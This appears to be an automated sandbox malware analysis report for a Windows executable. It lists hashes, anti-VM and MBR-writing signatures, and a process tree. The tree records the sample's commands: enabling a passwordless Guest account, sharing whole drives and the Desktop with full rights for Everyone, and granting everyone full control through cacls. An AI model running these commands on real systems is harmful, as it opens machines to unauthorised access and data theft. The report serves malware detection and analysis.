Analysis
-
max time kernel
117s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
26-05-2024 07:53
Static task
static1
Behavioral task
behavioral1
Sample
f5358c38641466c06cdd819a8f69eb93d208c3a9f222221cc7c6e0cf0ebbdfe7.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
f5358c38641466c06cdd819a8f69eb93d208c3a9f222221cc7c6e0cf0ebbdfe7.exe
Resource
win10v2004-20240508-en
General
-
Target
f5358c38641466c06cdd819a8f69eb93d208c3a9f222221cc7c6e0cf0ebbdfe7.exe
-
Size
3.3MB
-
MD5
51e442e27e653595685490dc7c7855a5
-
SHA1
35106601e646459da88b75c2b8058ebbf745f957
-
SHA256
f5358c38641466c06cdd819a8f69eb93d208c3a9f222221cc7c6e0cf0ebbdfe7
-
SHA512
95742561022003be9bfbdaa1e9c15d77d2b75273f9965174d819490d362c54eea358e99c5b94e09f5c41c1399caa893afea2f2e90ce9d6209611248f54cfc27d
-
SSDEEP
98304:NQOH5raw1GoHKqUifIwY/L4a3X62BcFOg/9MRhM6+baj:NH3BHKqUaS/LO2BM9MDMF
Malware Config
Signatures
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
Processes:
f5358c38641466c06cdd819a8f69eb93d208c3a9f222221cc7c6e0cf0ebbdfe7.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ f5358c38641466c06cdd819a8f69eb93d208c3a9f222221cc7c6e0cf0ebbdfe7.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
f5358c38641466c06cdd819a8f69eb93d208c3a9f222221cc7c6e0cf0ebbdfe7.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion f5358c38641466c06cdd819a8f69eb93d208c3a9f222221cc7c6e0cf0ebbdfe7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion f5358c38641466c06cdd819a8f69eb93d208c3a9f222221cc7c6e0cf0ebbdfe7.exe -
Processes:
f5358c38641466c06cdd819a8f69eb93d208c3a9f222221cc7c6e0cf0ebbdfe7.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA f5358c38641466c06cdd819a8f69eb93d208c3a9f222221cc7c6e0cf0ebbdfe7.exe -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes:
f5358c38641466c06cdd819a8f69eb93d208c3a9f222221cc7c6e0cf0ebbdfe7.exedescription ioc process File opened for modification \??\PhysicalDrive0 f5358c38641466c06cdd819a8f69eb93d208c3a9f222221cc7c6e0cf0ebbdfe7.exe -
Runs .reg file with regedit 1 IoCs
Processes:
regedit.exepid process 2640 regedit.exe -
Runs net.exe
-
Suspicious use of FindShellTrayWindow 10 IoCs
Processes:
f5358c38641466c06cdd819a8f69eb93d208c3a9f222221cc7c6e0cf0ebbdfe7.exepid process 3020 f5358c38641466c06cdd819a8f69eb93d208c3a9f222221cc7c6e0cf0ebbdfe7.exe 3020 f5358c38641466c06cdd819a8f69eb93d208c3a9f222221cc7c6e0cf0ebbdfe7.exe 3020 f5358c38641466c06cdd819a8f69eb93d208c3a9f222221cc7c6e0cf0ebbdfe7.exe 3020 f5358c38641466c06cdd819a8f69eb93d208c3a9f222221cc7c6e0cf0ebbdfe7.exe 3020 f5358c38641466c06cdd819a8f69eb93d208c3a9f222221cc7c6e0cf0ebbdfe7.exe 3020 f5358c38641466c06cdd819a8f69eb93d208c3a9f222221cc7c6e0cf0ebbdfe7.exe 3020 f5358c38641466c06cdd819a8f69eb93d208c3a9f222221cc7c6e0cf0ebbdfe7.exe 3020 f5358c38641466c06cdd819a8f69eb93d208c3a9f222221cc7c6e0cf0ebbdfe7.exe 3020 f5358c38641466c06cdd819a8f69eb93d208c3a9f222221cc7c6e0cf0ebbdfe7.exe 3020 f5358c38641466c06cdd819a8f69eb93d208c3a9f222221cc7c6e0cf0ebbdfe7.exe -
Suspicious use of SendNotifyMessage 9 IoCs
Processes:
f5358c38641466c06cdd819a8f69eb93d208c3a9f222221cc7c6e0cf0ebbdfe7.exepid process 3020 f5358c38641466c06cdd819a8f69eb93d208c3a9f222221cc7c6e0cf0ebbdfe7.exe 3020 f5358c38641466c06cdd819a8f69eb93d208c3a9f222221cc7c6e0cf0ebbdfe7.exe 3020 f5358c38641466c06cdd819a8f69eb93d208c3a9f222221cc7c6e0cf0ebbdfe7.exe 3020 f5358c38641466c06cdd819a8f69eb93d208c3a9f222221cc7c6e0cf0ebbdfe7.exe 3020 f5358c38641466c06cdd819a8f69eb93d208c3a9f222221cc7c6e0cf0ebbdfe7.exe 3020 f5358c38641466c06cdd819a8f69eb93d208c3a9f222221cc7c6e0cf0ebbdfe7.exe 3020 f5358c38641466c06cdd819a8f69eb93d208c3a9f222221cc7c6e0cf0ebbdfe7.exe 3020 f5358c38641466c06cdd819a8f69eb93d208c3a9f222221cc7c6e0cf0ebbdfe7.exe 3020 f5358c38641466c06cdd819a8f69eb93d208c3a9f222221cc7c6e0cf0ebbdfe7.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
f5358c38641466c06cdd819a8f69eb93d208c3a9f222221cc7c6e0cf0ebbdfe7.exepid process 3020 f5358c38641466c06cdd819a8f69eb93d208c3a9f222221cc7c6e0cf0ebbdfe7.exe 3020 f5358c38641466c06cdd819a8f69eb93d208c3a9f222221cc7c6e0cf0ebbdfe7.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
f5358c38641466c06cdd819a8f69eb93d208c3a9f222221cc7c6e0cf0ebbdfe7.execmd.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid process target process PID 3020 wrote to memory of 2636 3020 f5358c38641466c06cdd819a8f69eb93d208c3a9f222221cc7c6e0cf0ebbdfe7.exe cmd.exe PID 3020 wrote to memory of 2636 3020 f5358c38641466c06cdd819a8f69eb93d208c3a9f222221cc7c6e0cf0ebbdfe7.exe cmd.exe PID 3020 wrote to memory of 2636 3020 f5358c38641466c06cdd819a8f69eb93d208c3a9f222221cc7c6e0cf0ebbdfe7.exe cmd.exe PID 3020 wrote to memory of 2636 3020 f5358c38641466c06cdd819a8f69eb93d208c3a9f222221cc7c6e0cf0ebbdfe7.exe cmd.exe PID 2636 wrote to memory of 1596 2636 cmd.exe net.exe PID 2636 wrote to memory of 1596 2636 cmd.exe net.exe PID 2636 wrote to memory of 1596 2636 cmd.exe net.exe PID 2636 wrote to memory of 1596 2636 cmd.exe net.exe PID 1596 wrote to memory of 1628 1596 net.exe net1.exe PID 1596 wrote to memory of 1628 1596 net.exe net1.exe PID 1596 wrote to memory of 1628 1596 net.exe net1.exe PID 1596 wrote to memory of 1628 1596 net.exe net1.exe PID 2636 wrote to memory of 2120 2636 cmd.exe net.exe PID 2636 wrote to memory of 2120 2636 cmd.exe net.exe PID 2636 wrote to memory of 2120 2636 cmd.exe net.exe PID 2636 wrote to memory of 2120 2636 cmd.exe net.exe PID 2120 wrote to memory of 2656 2120 net.exe net1.exe PID 2120 wrote to memory of 2656 2120 net.exe net1.exe PID 2120 wrote to memory of 2656 2120 net.exe net1.exe PID 2120 wrote to memory of 2656 2120 net.exe net1.exe PID 2636 wrote to memory of 2684 2636 cmd.exe SecEdit.exe PID 2636 wrote to memory of 2684 2636 cmd.exe SecEdit.exe PID 2636 wrote to memory of 2684 2636 cmd.exe SecEdit.exe PID 2636 wrote to memory of 2684 2636 cmd.exe SecEdit.exe PID 2636 wrote to memory of 2596 2636 cmd.exe net.exe PID 2636 wrote to memory of 2596 2636 cmd.exe net.exe PID 2636 wrote to memory of 2596 2636 cmd.exe net.exe PID 2636 wrote to memory of 2596 2636 cmd.exe net.exe PID 2596 wrote to memory of 2848 2596 net.exe net1.exe PID 2596 wrote to memory of 2848 2596 net.exe net1.exe PID 2596 wrote to memory of 2848 2596 net.exe net1.exe PID 2596 wrote to memory of 2848 2596 net.exe net1.exe PID 2636 wrote to memory of 2092 2636 cmd.exe net.exe PID 2636 wrote to memory of 2092 2636 cmd.exe net.exe PID 2636 wrote to memory of 2092 2636 cmd.exe net.exe PID 2636 wrote to memory of 2092 2636 cmd.exe net.exe PID 2092 wrote to memory of 2716 2092 net.exe net1.exe PID 2092 wrote to memory of 2716 2092 net.exe net1.exe PID 2092 wrote to memory of 2716 2092 net.exe net1.exe PID 2092 wrote to memory of 2716 2092 net.exe net1.exe PID 2636 wrote to memory of 2640 2636 cmd.exe regedit.exe PID 2636 wrote to memory of 2640 2636 cmd.exe regedit.exe PID 2636 wrote to memory of 2640 2636 cmd.exe regedit.exe PID 2636 wrote to memory of 2640 2636 cmd.exe regedit.exe PID 3020 wrote to memory of 2472 3020 f5358c38641466c06cdd819a8f69eb93d208c3a9f222221cc7c6e0cf0ebbdfe7.exe net.exe PID 3020 wrote to memory of 2472 3020 f5358c38641466c06cdd819a8f69eb93d208c3a9f222221cc7c6e0cf0ebbdfe7.exe net.exe PID 3020 wrote to memory of 2472 3020 f5358c38641466c06cdd819a8f69eb93d208c3a9f222221cc7c6e0cf0ebbdfe7.exe net.exe PID 3020 wrote to memory of 2472 3020 f5358c38641466c06cdd819a8f69eb93d208c3a9f222221cc7c6e0cf0ebbdfe7.exe net.exe PID 2472 wrote to memory of 2584 2472 net.exe net1.exe PID 2472 wrote to memory of 2584 2472 net.exe net1.exe PID 2472 wrote to memory of 2584 2472 net.exe net1.exe PID 2472 wrote to memory of 2584 2472 net.exe net1.exe PID 3020 wrote to memory of 2612 3020 f5358c38641466c06cdd819a8f69eb93d208c3a9f222221cc7c6e0cf0ebbdfe7.exe net.exe PID 3020 wrote to memory of 2612 3020 f5358c38641466c06cdd819a8f69eb93d208c3a9f222221cc7c6e0cf0ebbdfe7.exe net.exe PID 3020 wrote to memory of 2612 3020 f5358c38641466c06cdd819a8f69eb93d208c3a9f222221cc7c6e0cf0ebbdfe7.exe net.exe PID 3020 wrote to memory of 2612 3020 f5358c38641466c06cdd819a8f69eb93d208c3a9f222221cc7c6e0cf0ebbdfe7.exe net.exe PID 2612 wrote to memory of 2680 2612 net.exe net1.exe PID 2612 wrote to memory of 2680 2612 net.exe net1.exe PID 2612 wrote to memory of 2680 2612 net.exe net1.exe PID 2612 wrote to memory of 2680 2612 net.exe net1.exe PID 3020 wrote to memory of 2448 3020 f5358c38641466c06cdd819a8f69eb93d208c3a9f222221cc7c6e0cf0ebbdfe7.exe net.exe PID 3020 wrote to memory of 2448 3020 f5358c38641466c06cdd819a8f69eb93d208c3a9f222221cc7c6e0cf0ebbdfe7.exe net.exe PID 3020 wrote to memory of 2448 3020 f5358c38641466c06cdd819a8f69eb93d208c3a9f222221cc7c6e0cf0ebbdfe7.exe net.exe PID 3020 wrote to memory of 2448 3020 f5358c38641466c06cdd819a8f69eb93d208c3a9f222221cc7c6e0cf0ebbdfe7.exe net.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\f5358c38641466c06cdd819a8f69eb93d208c3a9f222221cc7c6e0cf0ebbdfe7.exe"C:\Users\Admin\AppData\Local\Temp\f5358c38641466c06cdd819a8f69eb93d208c3a9f222221cc7c6e0cf0ebbdfe7.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3020 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\¿ªÆô¹²Ïí.bat2⤵
- Suspicious use of WriteProcessMemory
PID:2636 -
C:\Windows\SysWOW64\net.exeNET USER Guest /active:yes3⤵
- Suspicious use of WriteProcessMemory
PID:1596 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 USER Guest /active:yes4⤵PID:1628
-
C:\Windows\SysWOW64\net.exeNET USER Guest /passwordreq:no3⤵
- Suspicious use of WriteProcessMemory
PID:2120 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 USER Guest /passwordreq:no4⤵PID:2656
-
C:\Windows\SysWOW64\SecEdit.exeSecedit /configure /cfg "security.inf" /db secsetup.sdb /areas USER_RIGHTS /verbose3⤵PID:2684
-
C:\Windows\SysWOW64\net.exenet user guest /active:yes3⤵
- Suspicious use of WriteProcessMemory
PID:2596 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user guest /active:yes4⤵PID:2848
-
C:\Windows\SysWOW64\net.exenet user guest ""3⤵
- Suspicious use of WriteProcessMemory
PID:2092 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user guest ""4⤵PID:2716
-
C:\Windows\SysWOW64\regedit.exeregedit /s ┐¬╞⌠╣▓╧φ.reg3⤵
- Runs .reg file with regedit
PID:2640 -
C:\Windows\SysWOW64\net.exenet start workstation2⤵
- Suspicious use of WriteProcessMemory
PID:2472 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start workstation3⤵PID:2584
-
C:\Windows\SysWOW64\net.exenet start "Computer Browser"2⤵
- Suspicious use of WriteProcessMemory
PID:2612 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start "Computer Browser"3⤵PID:2680
-
C:\Windows\SysWOW64\net.exenet start server2⤵PID:2448
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start server3⤵PID:2488
-
C:\Windows\SysWOW64\net.exenet start netbios2⤵PID:2520
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start netbios3⤵PID:2948
-
C:\Windows\SysWOW64\net.exenet share ±¾µØ£¨CÅÌ)=C:\ /grant:Guests,full /grant:Everyone,full2⤵PID:2496
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 share ±¾µØ£¨CÅÌ)=C:\ /grant:Guests,full /grant:Everyone,full3⤵PID:2992
-
C:\Windows\SysWOW64\net.exenet share ±¾µØ£¨DÅÌ)=D:\ /grant:Guests,full /grant:Everyone,full2⤵PID:2116
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 share ±¾µØ£¨DÅÌ)=D:\ /grant:Guests,full /grant:Everyone,full3⤵PID:2924
-
C:\Windows\SysWOW64\net.exenet share ±¾µØ£¨FÅÌ)=F:\ /grant:Guests,full /grant:Everyone,full2⤵PID:2620
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 share ±¾µØ£¨FÅÌ)=F:\ /grant:Guests,full /grant:Everyone,full3⤵PID:2196
-
C:\Windows\SysWOW64\net.exenet share ÎïÀíÖ÷»ú×ÀÃæ=C:\Users\Admin\Desktop /grant:Guests,full /grant:Everyone,full2⤵PID:2964
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 share ÎïÀíÖ÷»ú×ÀÃæ=C:\Users\Admin\Desktop /grant:Guests,full /grant:Everyone,full3⤵PID:2904
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Admin\Desktop /e /t /g everyone:F2⤵PID:2252
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\¿ªÆô¹²Ïí.batFilesize
242B
MD580f0e65f938e3259b19f89241858ae23
SHA1f6d463a58007cc20b70988563c49b3410e68e92b
SHA25649b26f11aa955b7db4acc775b09476638525772c1a09e7c31dfdca19f6973dba
SHA512d51279e860cf401cba03c90d4edea4cfe408725b6a8737cfc3c63110f7f13f63f52ed350c2e79d1a287172d8c77d6a7dc658a1ac1d4867504a886aa108501d95
-
\??\PIPE\lsarpcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/3020-0-0x0000000000400000-0x0000000000C6A000-memory.dmpFilesize
8.4MB
-
memory/3020-2-0x0000000000400000-0x0000000000C6A000-memory.dmpFilesize
8.4MB
-
memory/3020-4-0x0000000000400000-0x0000000000C6A000-memory.dmpFilesize
8.4MB
-
memory/3020-3-0x0000000000400000-0x0000000000C6A000-memory.dmpFilesize
8.4MB
-
memory/3020-18-0x0000000000400000-0x0000000000C6A000-memory.dmpFilesize
8.4MB